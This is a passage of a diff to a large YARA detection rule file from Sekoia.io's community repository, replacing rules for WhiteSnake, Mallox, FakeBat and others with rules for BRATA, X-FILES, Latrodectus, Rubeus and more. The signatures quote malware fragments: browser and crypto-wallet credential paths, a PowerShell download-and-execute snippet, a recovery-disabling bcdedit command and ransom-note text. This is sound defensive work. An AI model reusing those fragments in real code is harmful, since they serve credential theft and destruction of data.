+        8B 87 ?? ?? ?? ??
+        89 41 ??
+        66 8B 87 ?? ?? ?? ??
+        66 89 41 ??
+        8B 45 ??
+        83 E8 05
+        50
+        51
+        E8 ?? ?? ?? ??
+        }
+		$chunk_4 = {
+        83 65 ?? ??
+        EB ??
+        8B 45 ??
+        40
+        89 45 ??
+        8B 45 ??
+        3B 45 ??
+        7D ??
+        8B 45 ??
+        03 45 ??
+        0F B6 08
+        8B 45 ??
+        33 D2
+        6A ??
+        5E
+        F7 F6
+        0F B6 84 15 ?? ?? ?? ??
+        33 C8
+        8B 45 ??
+        03 45 ??
+        88 08
+        EB ??
+        83 65 ?? ??
+        EB ??
+        8B 45 ??
+        40
+        89 45 ??
+        8B 45 ??
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( #nek > 10 or all of ( $str* ) )
+		filesize < 8MB and 3 of them
 }
-rule SEKOIA_Infostealer_Win_Whitesnake_Xor_Rc4_July12 : FILE
+rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Http : FILE
 {
 	meta:
-		description = "Detects WhiteSnake Stealer XOR and RC4 version"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "f2ebfcbd-9667-459a-a543-ce0be62c0dc4"
-		date = "2023-07-12"
+		id = "47d01ba8-9fdd-42d5-9f10-115f982dc133"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_whitesnake_xor_rc4_july12.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f14b95e5cb6ffaab14d0890847fe6e9dcfc3ee0b884c34d24d786420e2411a80"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sugardump_credentials_stealer_http.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8d1725da41704fd534d3438021a98d0fb9b9b5bfdc63cc3144c4957954be1870"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE}
-		$2 = {61 6e 61 6c 2e 6a 70 67}
-		$3 = {73 68 69 74 2e 6a 70 67}
-		$4 = {FE 0C ?? 00 20 00 01 00 00 3F ?? FF FF FF 20 00 00 00 00 FE 0E ?? 00 38 ?? 00 00 00 FE 0C}
-		$5 = "qemu" wide
-		$6 = "vbox" wide
+		$ = "\\Google\\Chrome\\User Data" wide
+		$ = "\\DebugLogWindowsDefender.txt" wide
+		$ = "Opera Software\\Opera Stable" wide
+		$ = "Microsoft\\Edge\\User Data" wide
+		$ = "\"encrypted_key\":\"(.*?)\\" wide
+		$ = "Url:" wide
+		$ = "Username:" wide
+		$ = "Password:" wide
+		$ = "Application:" wide
+		$ = "BCrypt.BCryptDecrypt" wide
+		$ = "C:\\Users\\User\\" wide
+		$ = "_CorExeMain"
+		$ = "http://" wide
 
 	condition:
-		($1 and $2 and filesize < 600KB ) or ( $3 and $4 and $5 and $6 and filesize < 300KB )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 10 of them
 }
-rule SEKOIA_Stealer_Win_Mgbot_Credential_Stealer : FILE
+rule SEKOIA_Trojan_Android_Brata : FILE
 {
 	meta:
-		description = "Detect MgBot credential stealer plugin"
+		description = "Detect samples of the Android banking trojan BRATA"
 		author = "Sekoia.io"
-		id = "e06501c1-c842-43f7-a429-9026bc0a4fd4"
-		date = "2024-03-20"
+		id = "fde9b82e-c677-44ed-b512-b225a3aba201"
+		date = "2022-01-27"
 		modified = "2024-12-19"
-		reference = "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/stealer_win_mgbot_credential_stealer.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "27f1b0ac818753804f0e67ac158d9376ab6beff8613ef94a1aa6cf8dd6815d49"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/trojan_android_brata.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0c94e5e0c01d4fa9bf28603787029938a3159f468dd3876e7d25646e93dd68b8"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "174a62201c7e2af67b7ad37bf7935f064a379f169cf257ca16e912a46ecc9841"
-		hash2 = "cb7d9feda7d8ebfba93ec428d5a8a4382bf58e5a70e4b51eb1938d2691d5d4a5"
 
 	strings:
-		$ = "Software\\Aerofox\\Foxmail\\Indenties" wide
-		$ = "Software\\Aerofox\\FoxmailPreview" wide
-		$ = "IMAP Password" wide
-		$ = "POP3 Password" wide
+		$goo0 = "Google Play services error"
+		$goo1 = "Error de Serveis de Google Play"
+		$goo2 = "Fehler bei Zugriff auf Google Play-Dienste"
+		$goo3 = "Erro nos servizos de Google Play"
+		$goo4 = "Fout met Google Play-services"
+		$goo5 = "Virhe Google Play -palveluissa"
+		$goo6 = "Erro do Google Play Services"
+		$goo7 = "Error de Google Play Services"
+		$res0 = "res/xml/device_admin.xml"
+		$res1 = "res/xml/windowchangedetectingservice.xml"
+		$res2 = "res/xml-v22/windowchangedetectingservice.xml"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint32be( 0 ) == 0x504B0304 and filesize > 2MB and filesize < 6MB and 7 of ( $goo* ) and 2 of ( $res* )
 }
-rule SEKOIA_Apt_Stripedfly : FILE
+rule SEKOIA_Backdoor_Xploitspy_Strings : FILE
 {
 	meta:
-		description = "Detects string relative to Stripedfly malware"
+		description = "Detects XploitSPY DEX file"
 		author = "Sekoia.io"
-		id = "81968d34-3247-4965-ba44-55747370c90e"
-		date = "2023-11-30"
+		id = "0aa86c2e-dba6-4ef4-a47e-f1b43e04f1f3"
+		date = "2022-08-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_stripedfly.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ded64ae30cf994162d4af649a34eadd4b8619cbced4392a6684129f8cf906136"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_xploitspy_strings.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "eabb1dbeaa8aefc33beb7fb158bbd8ad2c5b848d34c99473704da36a6dc461aa"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233171,218 +233921,223 @@ rule SEKOIA_Apt_Stripedfly : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "{\"id\":%d,\"jsonrpc\":\"2.0\",\"method\":\"%s\",\"params\":%s}"
-		$s2 = "{\"login\":\"%s\",\"pass\":\"%s\",\"agent\":\"\"}"
-		$s3 = "(tcp|ssl)://([A-Za-z0-9\\.\\-]+):([0-9]+)"
+		$ = { 04 30 78 43 42 00 }
+		$ = { 04 30 78 43 4C 00 }
+		$ = { 04 30 78 43 4F 00 }
+		$ = { 04 30 78 46 49 00 }
+		$ = { 04 30 78 47 50 00 }
+		$ = { 04 30 78 49 4E 00 }
+		$ = { 04 30 78 4C 4F 00 }
+		$ = { 04 30 78 4D 49 00 }
+		$ = { 04 30 78 4E 4F 00 }
+		$ = { 04 30 78 50 4D 00 }
+		$ = { 04 30 78 53 4D 00 }
+		$ = { 04 30 78 57 49 00 }
 
 	condition:
-		filesize < 3MB and 2 of them
+		uint32be( 0 ) == 0x6465780A and filesize < 1MB and 10 of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_7 : FILE
+rule SEKOIA_Infostealer_Win_Xfiles : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detect the X-FILES infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "de8069bb-59d7-4753-974a-f77c4b9e9bae"
-		date = "2023-02-03"
+		id = "3ad3ee19-6be8-484b-943c-05813cdcbd18"
+		date = "2022-02-03"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_7.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "27b5f3d24f7269e80b628be044d828d365fdba25891a5a1ecc973c419cf1dc6c"
+		reference = "https://twitter.com/3xp0rtblog/status/1375206169384521730"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_xfiles.yar#L1-L50"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "404ee02fa1905f49c3c3ca525cfb3c5ba1d2ec46554239035c1891d21f547a2c"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "ms.Write(ba, 0, (length / 4) * 3)"
-		$ = "var serialized_obj = "
-		$ = "var n = fmt.SurrogateSelector;"
-		$ = "var o = d.DynamicInvoke(al.ToArray())"
+		$xfi0 = "Telegram bot - @XFILESShop_Bot" wide
+		$xfi1 = "Telegram support - @XFILES_Seller" wide
+		$brw0 = "\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" wide
+		$brw1 = "\\Chromium\\User Data\\Default\\Cookies" wide
+		$brw2 = "\\Slimjet\\User Data\\Default\\Cookies" wide
+		$brw3 = "\\Vivaldi\\User Data\\Default\\Cookies" wide
+		$brw4 = "\\Opera Software\\Opera GX Stable\\Cookies" wide
+		$brw5 = "\\Opera Software\\Opera Stable\\Cookies" wide
+		$crp00 = "Tronlink" wide
+		$crp01 = "NiftyWallet" wide
+		$crp02 = "MetaMask" wide
+		$crp03 = "MathWallet" wide
+		$crp04 = "Coinbase" wide
+		$crp05 = "BinanceChain" wide
+		$crp06 = "GuardaWallet" wide
+		$crp07 = "EqualWallet" wide
+		$crp08 = "BitAppWallet" wide
+		$crp09 = "iWallet" wide
+		$crp10 = "Wombat" wide
+		$crp11 = "Zcash" wide
+		$crp12 = "Armory" wide
+		$crp13 = "Bytecoin" wide
+		$crp14 = "Jaxx" wide
+		$crp15 = "Exodus" wide
+		$crp16 = "Ethereum" wide
+		$crp17 = "AtomicWallet" wide
+		$crp18 = "Guarda" wide
+		$crp19 = "Coinomi" wide
+		$crp20 = "Litecoin" wide
+		$crp21 = "Dash" wide
+		$crp22 = "Bitcoin" wide
 
 	condition:
-		all of them and filesize < 2MB
+		uint16( 0 ) == 0x5A4D and any of ( $xfi* ) or 5 of ( $brw* ) and 20 of ( $crp* )
 }
-rule SEKOIA_Ransomware_Mallox : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_3 : FILE
 {
 	meta:
-		description = "Rule to detect mallox ransomware samples."
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "7e2edc94-26e4-4024-8bc0-8e90d76f5a96"
-		date = "2023-02-20"
+		id = "57b3ca9a-59c5-4b28-8eb9-36ff5b3633c2"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_mallox.yar#L1-L38"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c9300de42ee9eb3e820f49aa979234ff61c33dc6bf5d65bcb26e45b7126aafec"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_3.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ef62075c804080c0450f856b768da84a32f20e2f1ce5714e477b3e6f01d60503"
 		score = 75
-		quality = 54
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2023-05-24"
 		classification = "TLP:CLEAR"
-		hash1 = "2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439"
-		hash2 = "3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673"
-		hash3 = "4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6"
-		hash4 = "4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267"
-		hash5 = "77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5"
-		hash6 = "8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22"
-		hash7 = "a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525"
-		hash8 = "df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a"
-		hash9 = "e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009"
 
 	strings:
-		$s1 = "C:\\HOW TO RECOVER !!.TXT" wide ascii nocase
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\Raccine" wide ascii nocase
-		$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\vssadmin.exe" wide ascii nocase
-		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\wmic.exe" wide ascii nocase
-		$s5 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\wbadmin.exe" wide ascii nocase
-		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\bcdedit.exe" wide ascii nocase
-		$s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\powershell.exe" wide ascii nocase
-		$s8 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\diskshadow.exe" wide ascii nocase
-		$s9 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\net.exe" wide ascii nocase
-		$s10 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskkill.exe" wide ascii nocase
-		$s11 = "bcdedit /set {current} recoveryenabled no" wide ascii nocase
-		$mallox_fargo = ".FARGO" wide ascii nocase
-		$mallox_mallox = ".mallox" wide ascii nocase
-		$mallox_exploit = "newexploit@tutanota.com"
+		$ = "Function RC4(byteMessage, strKey)"
+		$ = "Sub Run()"
+		$ = "plain = RC4(decoded, "
+		$ = "Dim plain"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of ( $s* ) and 1 of ( $mallox_* )
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Ransomware_Linux_Icefire_2023 : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_13 : FILE
 {
 	meta:
-		description = "Rule to detect Linux IceFire ransomware samples."
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "b04964f4-3fdc-4745-9f4a-95a5a79bc7e1"
-		date = "2023-02-13"
+		id = "2d61d7b8-5348-4cc8-9d41-61799b573e3b"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_linux_icefire_2023.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "25033bd33311b070809d150f60803f32011d78a6a74d6b5f620a3216f0f95a6e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_13.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fb6b71bf1e89abf872fb3ef02a228f370f0fcc10d5aab70418fe8735283165da"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e9cc7fdfa3cf40ff9c3db0248a79f4817b170f2660aa2b2ed6c551eae1c38e0b"
 
 	strings:
-		$string01 = "********************Your network has been infected!!!********************"
-		$string02 = "IMPORTANT : DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED!!!"
-		$string03 = "username:"
-		$string04 = "password:"
-		$string05 = ".cfg.o.sh.img.txt.xml.jar.pid.ini.pyc.a.so.run.env.cache.xmlb"
-		$string06 = "./boot./dev./etc./lib./proc./srv./sys./usr./var./run"
-		$string07 = "/iFire-readme.txt"
-		$string08 = ".iFire"
-		$string09 = "iFire.pid"
+		$ = "Private Function decodeHex(hex)"
+		$ = "EL.Text = hex "
+		$ = "serialized_obj = serialized_obj & "
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
 
 	condition:
-		uint32be( 0 ) == 0x7F454C46 and all of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Tool_Chisel_Strings : FILE
+rule SEKOIA_Backdoor_Lin_Bifrost : FILE
 {
 	meta:
-		description = "Detects Chisel"
+		description = "Detect the Bifrost backdor based on strings"
 		author = "Sekoia.io"
-		id = "667a8aa3-772b-45f1-8c89-acb7b976888d"
-		date = "2024-03-14"
+		id = "9726b5f5-8cc3-4fad-950b-f20cac04d496"
+		date = "2024-03-05"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_chisel_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fe389d9d0ae73c79f1040274e21135d4df645c5ac672fc824923f0a5a085be8a"
+		reference = "https://unit42.paloaltonetworks.com/new-linux-variant-bifrost-malware/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_lin_bifrost.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a3fd671c02c29f67cf5b8d2d0e857336da72f989688f2db19cd028398080c5e2"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "8e85cb6f2215999dc6823ea3982ff4376c2cbea53286e95ed00250a4a2fe4729"
+		hash2 = "2aeb70f72e87a1957e3bc478e1982fe608429cad4580737abe58f6d78a626c05"
+		hash3 = "f2bef6bed27f4b527118dd62b4035003c14afaffa72729c8117f213623f644ec"
 
 	strings:
-		$ = "tunnel.(*Tunnel).handleSSHChannel."
-		$ = "server.(*Server).handleWebsocket"
-		$ = "tunnel.(*udpHandler)"
-		$ = "server.(*Server).tlsLetsEncrypt"
-		$ = "cnet.(*wsConn).SetPingHandler.(*Conn)"
-		$ = "tunnel.(*udpConns).dial."
+		$ = "%c2%s%c3%u%c4%u-%.2u-%.2u %.2u:%.2u"
+		$ = "%c1%s%c3D%c4%u-%.2u-%.2u %.2u:%.2u"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 15MB and 3 of them
+		uint32be( 0 ) == 0x7f454c46 and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader_Vbs : FILE
+rule SEKOIA_Rat_Win_Lilith
 {
 	meta:
-		description = "Detects malicious VBScript executed by LNK/mshta"
+		description = "Detect the Lilith malware"
 		author = "Sekoia.io"
-		id = "cc29d5d9-58bd-4f68-8673-daa41abfc7be"
-		date = "2023-01-24"
+		id = "944637e6-c4e4-423f-9f4c-a26b4fce3729"
+		date = "2023-02-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_ddrdoh_vbs_downloader_vbs.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c91e1ce26c0735e8c68fe39f2fbeda8aed51cd4f9a0b967b5d184843728dcef4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_lilith.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ac2ad9e68616e6e7d07e105293545c96b72c956dbcf3c3bf317460cafc13be48"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 76
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "b24gZXJyb3IgcmVzd" ascii
-		$ = "BinaryStream.readtext" ascii nocase
-		$ = "createobject(\"msxml2.domdocument.3.0\").createelement(" ascii nocase
-		$ = "Dim cSecond, cMinute, CHour, cDay, cMonth, cYear" ascii nocase
-		$ = "tDate & \"T\" & tTime"
-		$ = "AutoOpen" ascii nocase
+		$ = {55 6d 56 6e 55 58 56 6c 63 6e 6c 57 59 57 78 31 5a 55 56 34 51 51 3d 3d}
+		$ = {67 65 74 61 64 64 72 69 6e 66 6f 3a 20 25 73}
 
 	condition:
-		5 of them and filesize < 50KB
+		all of them
 }
-rule SEKOIA_Loader_Fakebat_Initial_Powershell_May24 : FILE
+rule SEKOIA_Hacktool_Rubeus_Strings : FILE
 {
 	meta:
-		description = "Finds FakeBat initial PowerShell script downloading and executing the next-stage payload."
+		description = "Detects Rubeus based on strings"
 		author = "Sekoia.io"
-		id = "adf0e4fc-fa98-470b-9535-bd30d0bdb3aa"
-		date = "2024-05-28"
+		id = "048cab99-c288-44c2-9dc6-74eed02ef8f5"
+		date = "2022-02-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_fakebat_initial_powershell_may24.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6a699df361b0cb2baf1d0b128f795aa9918ebe11daaeb1fa49aebf9320add762"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_rubeus_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "606c1b3c29dd4b609eba64bc5d02a81859bb574ee10bce8b0f355ac01d99689f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2024-06-21"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "='http" wide
-		$str02 = "=(iwr -Uri $" wide
-		$str03 = " -UserAgent $" wide
-		$str04 = " -UseBasicParsing).Content; iex $" wide
+		$ = "includeComputerAccounts" ascii
+		$ = "passwordsOutfile" ascii
+		$ = "monitorIntervalSeconds" ascii
+		$ = "displayNewTickets" ascii
+		$ = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii
 
 	condition:
-		3 of ( $str* ) and filesize < 1KB and true
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Crime_Sload_Mainpowershellimplant : FILE
+rule SEKOIA_Loader_Latrodectus_Dll : FILE
 {
 	meta:
-		description = "Detects the main PowerShell implant"
+		description = "Finds Latrodectus samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "09d268e7-d688-4390-856e-9e9ed47aec04"
-		date = "2022-08-03"
+		id = "c60676ad-31cb-4f4d-9073-757a0ad7d23d"
+		date = "2023-12-08"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crime_sload_mainpowershellimplant.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "37ec263dddf7719d03a3d58b4b196597737a1e28f8072f3933cdf954f2b696cd"
+		reference = "https://twitter.com/Myrtus0x0/status/1732997981866209550"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_latrodectus_dll.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "57aae1944eded14537cdc1c17b21cfc503687a416551b782fc76f8c7858e936e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233390,39 +234145,42 @@ rule SEKOIA_Crime_Sload_Mainpowershellimplant : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$c1 = "priority FOREGROUND"
-		$c2 = "app|Services|RuntimeBroker|Search|host"
-		$c3 = "([wmiclass]\"win32_Process\").create("
-		$c4 = "Start-Sleep -seconds"
-		$c5 = "while($e -eq 1){ $dCnt++;"
-		$d1 = "112,114,105,111,114,105,116,121,32,70,79,82,69,71,82,79,85,78,68"
-		$d2 = "97,112,112,124,83,101,114,118,105,99,101,115,124,82,117,110,116,105,109,101,66,114,111,107,101,114,124,83,101,97,114,99,104,124,104,111,115,116"
-		$d3 = "40,91,119,109,105,99,108,97,115,115,93,34,119,105,110,51,50,95,80,114,111,99,101,115,115,34,41,46,99,114,101,97,116,101,40"
-		$d4 = "83,116,97,114,116,45,83,108,101,101,112,32,45,115,101,99,111,110,100,115"
-		$d5 = "119,104,105,108,101,40,36,101,32,45,101,113,32,49,41,123,32,36,100,67,110,116,43,43,59"
-		$b1 = "priority FOREGROUND" base64
-		$b2 = "app|Services|RuntimeBroker|Search|host" base64
-		$b3 = "([wmiclass]\"win32_Process\").create(" base64
-		$b4 = "Start-Sleep -seconds" base64
-		$b5 = "while($e -eq 1){ $dCnt++;" base64
+		$str01 = "c:\\temp\\debug.pdb" fullword ascii
+		$str02 = "Bottmp64.dll" fullword ascii
+		$str03 = "scab" fullword ascii
+		$str04 = "&wmic=" fullword ascii
+		$str05 = "&ipconfig=" fullword ascii
+		$str06 = "&systeminfo=" fullword ascii
+		$str07 = "&domain_trusts=" fullword ascii
+		$str08 = "&domain_trusts_all=" fullword ascii
+		$str09 = "&net_view_all_domain=" fullword ascii
+		$str10 = "&net_view_all=" fullword ascii
+		$str11 = "&net_group=" fullword ascii
+		$str12 = "&net_config_ws=" fullword ascii
+		$str13 = "&net_wmic_av=" fullword ascii
+		$str14 = "&whoami_group=" fullword ascii
+		$str15 = "\"subproc\": [" fullword ascii
+		$str16 = "&proclist=[" fullword ascii
+		$str17 = "&desklinks=[" fullword ascii
+		$str18 = "Update_%x" fullword wide
+		$str19 = "Custom_update" fullword wide
+		$str20 = "\\update_data.dat" fullword wide
 
 	condition:
-		3 of ( $c* ) or 3 of ( $d* ) or 3 of ( $b* ) and filesize < 30KB
+		uint16( 0 ) == 0x5A4D and 10 of them
 }
-rule SEKOIA_Dropper_Mac_Lazarus_Manuscrypt : FILE
+rule SEKOIA_Apt_Unknown_Sessionmanageriis_Strings : FILE
 {
 	meta:
-		description = "MacOS Manuscrypt dropped by TraderTraitor"
+		description = "Detects the IIS SessionManager backdoor"
 		author = "Sekoia.io"
-		id = "6138bd0c-1fcf-4586-b2b6-29955c7d6266"
-		date = "2022-04-19"
+		id = "7d55dd82-509f-444d-a1ba-6417b51f392f"
+		date = "2022-07-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/dropper_mac_lazarus_manuscrypt.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
